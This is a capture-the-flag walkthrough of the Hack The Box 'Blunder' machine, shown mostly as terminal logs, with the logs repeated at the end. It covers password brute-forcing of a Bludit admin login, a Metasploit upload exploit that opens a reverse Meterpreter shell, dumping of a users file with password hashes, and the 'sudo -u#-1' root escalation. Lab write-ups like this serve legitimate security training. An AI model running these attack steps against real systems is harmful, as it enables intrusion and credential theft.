Blunder

HTB Writer Up

Lets start with nmap

root@liberty:/home/kali# nmap blunder.htb
Starting Nmap 7.91 ( https://nmap.org ) 
Nmap scan report for blunder.htb (10.129.4.41)
Host is up (0.019s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE
21/tcp closed ftp
80/tcp open   http

Nmap done: 1 IP address (1 host up) scanned in 4.82 seconds
root@liberty:/home/kali# nmap -sV blunder.htb
Starting Nmap 7.91 ( https://nmap.org ) 
Nmap scan report for blunder.htb (10.129.4.41)
Host is up (0.015s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
root@liberty:/home/kali#

Next is Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers:

root@liberty:/home/kali# nikto -h blunder.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.129.4.41
+ Target Hostname:    blunder.htb
+ Target Port:        80
+ Start Time:         2020-10-13 13:32:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: Bludit
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ "robots.txt" contains 1 entry which should be manually viewed.

Next we will enumerate some directories with Dirb - DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response

This allows us to quickly locate interesting directories such as admin portals:

We also find the find site. This site has a lot of words. I think this is a perfect time for CeWL.

root@liberty:~# cewl -d 5 -m 3 -w wordlist http://blunder.htb
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@liberty:~# ls
Desktop  Documents  Downloads  htb  Music  Pictures  Public  Templates  Videos  wordlist
root@liberty:~# cat wordlist 
the
Load
Plugins
and
for
Include
Site
Page
has
About
King
with
USB
Begin
more
End
service
from
Stadia
Dynamic
...

After fuzzing with dirb i came across this information on /to.txt

-Inform fergus that the new blog needs images - PENDING

I'm thinking that fergus might be a username. Also after doing a quick google I came across this exploit:

There are a couple of ruby requirements for this exploit so lets install them now.

root@liberty:~/htb# gem install httpclient
Fetching httpclient-2.8.3.gem
Successfully installed httpclient-2.8.3
Parsing documentation for httpclient-2.8.3
Installing ri documentation for httpclient-2.8.3
Done installing documentation for httpclient after 0 seconds
1 gem installed
root@liberty:~/htb# gem install docopt
Fetching docopt-0.6.1.gem
Successfully installed docopt-0.6.1
Parsing documentation for docopt-0.6.1
Installing ri documentation for docopt-0.6.1
Done installing documentation for docopt after 0 seconds
1 gem installed
root@liberty:~/htb#

Lets give this exploit a try:

root@liberty:~/htb# ruby blut-bf.rb -r http://blunder.htb/admin/ -u fergus -w ../wordlist 
[*] Trying password: the
[*] Trying password: Load
[*] Trying password: Plugins
[*] Trying password: and
[*] Trying password: for
[*] Trying password: Include
[*] Trying password: Site
[*] Trying password: Page
[*] Trying password: has
[*] Trying password: About
[*] Trying password: King
[*] Trying password: with
[*] Trying password: USB
[*] Trying password: Begin
...

[+] Password found: RolandDeschain

With these creds we how have access to the admin portal. After googling "blundit admin portal exploit" I came across this article:

Looks like there is also a Metasploit moduleshell

msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 10.10.14.45:4444 
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading ZTJkGHVYBh.png...
[*] Uploading .htaccess...
[*] Executing ZTJkGHVYBh.png...
[*] Sending stage (38288 bytes) to 10.129.4.41
[*] Meterpreter session 1 opened (10.10.14.45:4444 -> 10.129.4.41:59626) at 2020-10-13 16:08:49 -0400
[+] Deleted .htaccess

meterpreter > shell
Process 4834 created.
Channel 1 created.
whoami
www-data

Lets stablize this shell

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$

Lets begin our enumeration both manually and automated. To automate we will use linenum.sh:

root@liberty:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.4.41 - - [TBD] "GET /linenum.sh HTTP/1.1" 200

Grep the contents on the application looking for phrases such as auth, password, and key we come across this result for users.php

cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Admin",
        "firstName": "Administrator",
        "lastName": "",
        "role": "admin",
        "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
        "salt": "5dde2887e7aca",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    },
    "fergus": {
        "firstName": "",
        "lastName": "",
        "nickname": "",
        "description": "",
        "role": "author",
        "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
        "salt": "jqxpjfnv",
        "email": "",
        "registered": "2019-11-27 13:26:44",
        "tokenRemember": "",
        "tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "codepen": "",
        "instagram": "",
        "github": "",
        "gitlab": "",
        "linkedin": "",
        "mastodon": ""
    }
}www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$

Lets user hash-identifier to see what we are dealing with here:

root@liberty:~/htb# hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: bfcc887f62e36ea019e3295aafb8a3885966e265

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

This hash can be cracked online. Let use the password to access the system with this user.

www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$ su hugo su hugo Password: Password120

Lets locate the user flag now that we have access outside of our php shell.

hugo@blunder:~$ ls
ls
Desktop    Downloads  Pictures  Templates  Videos
Documents  Music      Public    user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
FLAG HERE

We can check our sudo permission using sudo -l

hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$

After some googling we come across this exploit:

They don't come any easier than this. Looks like our privilege escalation require this one line of code - sudo -u#-1 /bin/bash

hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# cat /root/root.txt
cat /root/root.txt
FLAG HERE
root@blunder:/home/hugo#

PreviousFuse NextUnblanced

Last updated 4 years ago

root@liberty:/home/kali# nmap blunder.htb Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for blunder.htb (10.129.4.41) Host is up (0.019s latency). Not shown: 998 filtered ports PORT STATE SERVICE 21/tcp closed ftp 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 4.82 seconds root@liberty:/home/kali# nmap -sV blunder.htb Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for blunder.htb (10.129.4.41) Host is up (0.015s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds root@liberty:/home/kali#

root@liberty:/home/kali# nikto -h blunder.htb - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.129.4.41 + Target Hostname: blunder.htb + Target Port: 80 + Start Time: 2020-10-13 13:32:20 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.41 (Ubuntu) + Retrieved x-powered-by header: Bludit + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + All CGI directories 'found', use '-C none' to test none + "robots.txt" contains 1 entry which should be manually viewed.

root@liberty:~# cewl -d 5 -m 3 -w wordlist http://blunder.htb CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/) root@liberty:~# ls Desktop Documents Downloads htb Music Pictures Public Templates Videos wordlist root@liberty:~# cat wordlist the Load Plugins and for Include Site Page has About King with USB Begin more End service from Stadia Dynamic ...

root@liberty:~/htb# gem install httpclient Fetching httpclient-2.8.3.gem Successfully installed httpclient-2.8.3 Parsing documentation for httpclient-2.8.3 Installing ri documentation for httpclient-2.8.3 Done installing documentation for httpclient after 0 seconds 1 gem installed root@liberty:~/htb# gem install docopt Fetching docopt-0.6.1.gem Successfully installed docopt-0.6.1 Parsing documentation for docopt-0.6.1 Installing ri documentation for docopt-0.6.1 Done installing documentation for docopt after 0 seconds 1 gem installed root@liberty:~/htb#

root@liberty:~/htb# ruby blut-bf.rb -r http://blunder.htb/admin/ -u fergus -w ../wordlist [*] Trying password: the [*] Trying password: Load [*] Trying password: Plugins [*] Trying password: and [*] Trying password: for [*] Trying password: Include [*] Trying password: Site [*] Trying password: Page [*] Trying password: has [*] Trying password: About [*] Trying password: King [*] Trying password: with [*] Trying password: USB [*] Trying password: Begin ... [+] Password found: RolandDeschain

msf5 exploit(linux/http/bludit_upload_images_exec) > run [*] Started reverse TCP handler on 10.10.14.45:4444 [+] Logged in as: fergus [*] Retrieving UUID... [*] Uploading ZTJkGHVYBh.png... [*] Uploading .htaccess... [*] Executing ZTJkGHVYBh.png... [*] Sending stage (38288 bytes) to 10.129.4.41 [*] Meterpreter session 1 opened (10.10.14.45:4444 -> 10.129.4.41:59626) at 2020-10-13 16:08:49 -0400 [+] Deleted .htaccess meterpreter > shell Process 4834 created. Channel 1 created. whoami www-data

cat users.php <?php defined('BLUDIT') or die('Bludit CMS.'); ?> { "admin": { "nickname": "Admin", "firstName": "Administrator", "lastName": "", "role": "admin", "password": "bfcc887f62e36ea019e3295aafb8a3885966e265", "salt": "5dde2887e7aca", "email": "", "registered": "2019-11-27 07:40:55", "tokenRemember": "", "tokenAuth": "b380cb62057e9da47afce66b4615107d", "tokenAuthTTL": "2009-03-15 14:00", "twitter": "", "facebook": "", "instagram": "", "codepen": "", "linkedin": "", "github": "", "gitlab": "" }, "fergus": { "firstName": "", "lastName": "", "nickname": "", "description": "", "role": "author", "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7", "salt": "jqxpjfnv", "email": "", "registered": "2019-11-27 13:26:44", "tokenRemember": "", "tokenAuth": "0e8011811356c0c5bd2211cba8c50471", "tokenAuthTTL": "2009-03-15 14:00", "twitter": "", "facebook": "", "codepen": "", "instagram": "", "github": "", "gitlab": "", "linkedin": "", "mastodon": "" } }www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$

root@liberty:~/htb# hash-identifier ######################################################################### # __ __ __ ______ _____ # # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 # # By Zion3R # # www.Blackploit.com # # Root@Blackploit.com # ######################################################################### -------------------------------------------------- HASH: bfcc887f62e36ea019e3295aafb8a3885966e265 Possible Hashs: [+] SHA-1 [+] MySQL5 - SHA-1(SHA-1($pass))

hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$ sudo -l sudo -l Password: Password120 Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User hugo may run the following commands on blunder: (ALL, !root) /bin/bash hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$